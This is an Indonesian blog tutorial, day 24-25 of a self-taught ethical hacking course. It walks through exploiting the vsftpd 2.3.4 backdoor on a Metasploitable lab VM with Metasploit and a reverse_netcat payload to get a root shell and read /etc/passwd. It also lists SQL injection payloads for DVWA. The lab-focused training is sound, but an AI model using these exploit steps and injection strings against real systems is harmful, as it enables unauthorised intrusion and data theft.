Langsung ke konten utama

Hari 24-25: Eksploitasi Dasar (Lab DVWA/Metasploitable) – Melancarkan Serangan Terkendali


Hari 24-25: Eksploitasi Dasar (Lab DVWA/Metasploitable) – Melancarkan Serangan Terkendali


Anda telah melalui teori, menyiapkan lab, dan mengenal alat canggih seperti Nmap dan Metasploit Framework. Kini, di Hari 24 dan 25 pelatihan otodidak ini, saatnya kita menyatukan semua pengetahuan tersebut dan melangkah ke fase paling mendebarkan: eksploitasi. Kita akan mempraktikkan hacking etis secara terkendali di lingkungan lab aman Anda (DVWA atau Metasploitable) untuk melihat bagaimana vulnerability dapat dimanfaatkan. Hingga saat ini, kemampuan untuk mengeksekusi exploit secara etis di lingkungan terkontrol adalah keterampilan inti yang membedakan ethical hacker dari sekadar teoritis.

Penting: Selalu ingat, semua latihan ini harus dilakukan di dalam virtual machine Anda dan hanya menargetkan DVWA atau Metasploitable yang sudah Anda siapkan. Jangan pernah, sekali lagi, jangan pernah mencoba teknik ini pada sistem lain di internet atau jaringan pribadi mana pun tanpa izin tertulis. Keamanan dan etika adalah yang utama.


Eksploitasi: Memanfaatkan Kerentanan

Eksploitasi adalah proses menggunakan kode (disebut exploit) yang dirancang untuk mengambil keuntungan dari vulnerability spesifik dalam sistem atau aplikasi target. Tujuan dari eksploitasi adalah untuk mendapatkan akses tidak sah, menjalankan kode berbahaya, atau menyebabkan denial of service.

Dalam konteks ethical hacking, tujuan kita adalah mensimulasikan serangan ini untuk:

  1. Memahami bagaimana hacker jahat beroperasi.

  2. Mengevaluasi dampak dari vulnerability yang ditemukan.

  3. Memberikan rekomendasi untuk memperbaiki celah keamanan tersebut.


Skenario Latihan: Menggunakan Metasploit pada Metasploitable

Kita akan fokus pada penggunaan Metasploit Framework untuk mengeksploitasi Metasploitable 2/3, karena ini adalah skenario yang relatif straightforward dan sering digunakan untuk pemula.

Prasyarat:

  • Kali Linux VM Anda berjalan.

  • Metasploitable VM Anda berjalan di jaringan internal yang sama.

  • Anda sudah tahu alamat IP Metasploitable (misalnya, 192.168.56.102).

  • Anda sudah familiar dengan perintah dasar Metasploit (msfconsole, use, show options, set).

Skenario Eksploitasi Umum: FTP Backdoor pada Metasploitable

Metasploitable 2 memiliki layanan FTP (vsftpd 2.3.4) yang rentan terhadap backdoor yang disengaja. Kita bisa mengeksploitasi ini untuk mendapatkan akses shell ke Metasploitable.

Langkah-langkah di Terminal Kali Linux Anda:

  1. Mulai Metasploit Konsol:

    Bash
    msfconsole
    
  2. Cari Exploit yang Sesuai:

    Kita tahu Metasploitable menggunakan vsftpd 2.3.4. Mari kita cari exploit untuk itu.

    search vsftpd
    

    Anda akan melihat hasil seperti exploit/unix/ftp/vsftpd_234_backdoor. Ini adalah yang kita cari.

  3. Pilih Exploit:

    use exploit/unix/ftp/vsftpd_234_backdoor
    
  4. Tampilkan Opsi yang Diperlukan:

    show options
    

    Anda akan melihat daftar opsi. Yang paling penting adalah RHOSTS (alamat IP target) dan LHOST (alamat IP mesin penyerang/Kali Linux Anda).

  5. Atur Opsi:

    • Setel RHOSTS ke IP Metasploitable Anda.

      set RHOSTS 192.168.56.102  # Ganti dengan IP Metasploitable Anda
      
    • Setel LHOST ke IP Kali Linux Anda di jaringan internal yang sama. Anda bisa menemukan IP ini dengan ifconfig atau ip a di Terminal Kali yang lain.

      set LHOST 192.168.56.101  # Ganti dengan IP Kali Linux Anda
      
    • Verifikasi lagi opsi-opsi dengan show options.

  6. Pilih dan Atur Payload:

    • Pertama, lihat payload yang tersedia untuk exploit ini:

      show payloads
      

      Anda mungkin melihat banyak opsi. Untuk latihan awal, cmd/unix/reverse_netcat atau cmd/unix/reverse_bash adalah pilihan bagus untuk mendapatkan shell sederhana.

    • Setel payload:

      set payload cmd/unix/reverse_netcat
      
    • Pastikan opsi payload sudah benar dengan show options lagi. LHOST dan LPORT pada payload akan otomatis terisi dari pengaturan global Anda atau exploit.

  7. Jalankan Exploit!

    exploit
    

    Jika berhasil, Anda akan melihat pesan yang menunjukkan payload terkirim, dan Anda akan mendapatkan sesi shell terbuka ke Metasploitable. Anda akan melihat prompt shell baru (misalnya, whoami akan mengembalikan root, yang berarti Anda mendapatkan akses root!).

  8. Eksplorasi (Post-Exploitation Sederhana):

    • Coba perintah Linux dasar seperti ls, pwd, id, cat /etc/passwd.

    • Ini adalah bukti bahwa Anda berhasil mengeksploitasi kerentanan dan mendapatkan akses ke sistem target.

    • Ketik exit atau Ctrl+C untuk keluar dari sesi shell.


Skenario Latihan: SQL Injection pada DVWA

Jika Anda memilih DVWA, mari kita coba eksploitasi SQL Injection pada tingkat kesulitan "Low".

Prasyarat:

  • Kali Linux VM berjalan.

  • DVWA diinstal dan berjalan di VM terpisah di jaringan internal yang sama.

  • Anda sudah login ke DVWA (username: admin, password: password) dan mengatur Security Level ke "Low".

Langkah-langkah di Browser Kali Linux Anda:

  1. Akses DVWA: Buka browser di Kali Linux Anda dan navigasi ke alamat IP DVWA Anda (misal: http://192.168.56.103/dvwa). Login sebagai admin/password.

  2. Pilih SQL Injection: Di menu samping kiri DVWA, pilih "SQL Injection".

  3. Eksploitasi SQL Injection:

    • Pada kolom "User ID:", coba masukkan 1 lalu klik "Submit". Anda akan melihat detail pengguna dengan ID 1.

    • Sekarang, coba inject kode SQL berbahaya. Masukkan:

      SQL
      1' OR '1'='1
      

      Lalu klik "Submit". Jika berhasil, Anda akan melihat semua pengguna di database karena '1'='1' akan selalu benar.

    • Untuk mendapatkan nama kolom database (enumeration):

      SQL
      1' ORDER BY 10-- -
      

      (Ubah angka 10 hingga Anda mendapatkan error, lalu kurangi angka hingga tidak ada error. Ini akan menunjukkan jumlah kolom.)

    • Untuk mendapatkan versi database (contoh UNION-based injection):

      SQL
      1' UNION SELECT 1,version() -- -
      

      (Note: -- - adalah komentar di SQL, untuk mengabaikan sisa query asli.)

    • Eksplorasi: Ada banyak skenario SQL Injection yang bisa Anda coba di DVWA. Cari tutorial online spesifik untuk DVWA SQL Injection.


Latihan untuk Hari 24-25:

  1. Pilih salah satu skenario eksploitasi di atas: (Metasploit vsftpd backdoor ATAU DVWA SQL Injection).

  2. Ikuti langkah-langkahnya dengan teliti di lingkungan lab Anda.

  3. Dokumentasikan setiap perintah yang Anda jalankan dan output yang Anda dapatkan. Apa yang terjadi? Mengapa?

  4. Ulangi percobaan beberapa kali sampai Anda merasa yakin dengan prosesnya.

  5. Jika Anda berhasil mendapatkan shell ke Metasploitable, coba jalankan beberapa perintah dasar Linux untuk mengonfirmasi akses Anda.

Ini adalah momen "Eureka!" bagi banyak ethical hacker pemula. Merasakan sendiri bagaimana exploit bekerja adalah pengalaman belajar yang tak ternilai.


Bagaimana pengalaman pertama Anda dalam melancarkan eksploitasi terkendali ini? Apakah Anda berhasil mendapatkan akses, atau ada tantangan yang Anda hadapi?

Back to 30days Hacking


Komentar

Postingan populer dari blog ini

Hari 1-2: Mengenal Dunia Hacking dan Pentingnya Keamanan Siber

Hari 1-2: Mengenal Dunia Hacking dan Pentingnya Keamanan Siber   Selamat datang di perjalanan Anda memahami dunia hacking ! Mungkin istilah "hacker" sering diidentikkan dengan kejahatan, pencurian data, atau perusakan sistem. Namun, di Hari 1 dan 2 pelatihan otodidak ini, kita akan meluruskan pandangan tersebut dan memahami bahwa hacking sejatinya adalah sebuah keahlian, yang bisa digunakan untuk tujuan baik maupun buruk. Hingga saat ini dengan maraknya ancaman digital, memahami dasar-dasar ini adalah langkah pertama yang krusial. Mari kita selami apa itu hacking sebenarnya, jenis-jenisnya, dan mengapa Anda perlu peduli tentang keamanan siber. Meluruskan Definisi: Apa Itu Hacking ? Secara sederhana, hacking adalah proses eksplorasi dan pemahaman yang mendalam tentang bagaimana sebuah sistem (komputer, jaringan, software , atau bahkan pikiran manusia) bekerja, seringkali dengan tujuan untuk mencari celah atau keterbatasan yang bisa dimanfaatkan. Orang yang melakukannya dis...

Hari 30: Evaluasi Diri & Rencana Selanjutnya – Memetakan Perjalanan Hacking Anda

Hari 30: Evaluasi Diri & Rencana Selanjutnya – Memetakan Perjalanan Hacking Anda Selamat! Anda telah mencapai Hari ke-30 dalam perjalanan otodidak ethical hacking Anda. Ini adalah pencapaian luar biasa yang menunjukkan dedikasi dan minat besar Anda di bidang ini. Anda telah belajar banyak, mulai dari fondasi jaringan, eksplorasi Linux, pemahaman vulnerability web, kriptografi , seni reconnaissance , hingga mempraktikkan eksploitasi dasar dan memahami bahaya social engineering . Anda tidak lagi menjadi pemula mutlak; Anda kini memiliki dasar yang kuat untuk terus berkembang. Hari terakhir ini bukan tentang mempelajari konsep baru, melainkan tentang evaluasi diri dan merencanakan langkah-langkah Anda selanjutnya . Bidang keamanan siber sangat luas, dan 30 hari ini hanyalah permulaan. Menganalisis Progres Anda: Pertanyaan untuk Refleksi Diri Luangkan waktu sejenak untuk melihat kembali apa yang telah Anda lakukan. Jujurlah pada diri sendiri saat menjawab pertanyaan-pertanyaan ini:...

Hari 10-11: Konsep Kriptografi Lanjutan – Fondasi Keamanan Digital

  Hari 10-11: Konsep Kriptografi Lanjutan – Fondasi Keamanan Digital Setelah memahami bagaimana website berinteraksi dan kerentanannya, kini kita akan mendalami teknologi yang menjadi tulang punggung keamanan di era digital: kriptografi . Di Hari 10 dan 11 pelatihan otodidak ini, kita akan membahas konsep enkripsi dan hashing secara lebih mendalam, serta bagaimana keduanya berperan penting dalam mengamankan komunikasi dan data kita dari tangan hacker . Dengan semakin canggihnya metode cybercrime , memahami kriptografi adalah kunci untuk membangun pertahanan yang kokoh. Mari kita pahami bagaimana matematika dan algoritma melindungi privasi Anda. Mengulang Singkat: Apa Itu Kriptografi? Seperti yang sudah kita bahas sebelumnya, kriptografi adalah ilmu mengubah informasi ( plaintext ) menjadi bentuk yang tidak bisa dibaca ( ciphertext ) menggunakan enkripsi , dan mengembalikannya ke bentuk asli melalui dekripsi . Ini memastikan kerahasiaan data. Namun, kriptografi juga mencakup a...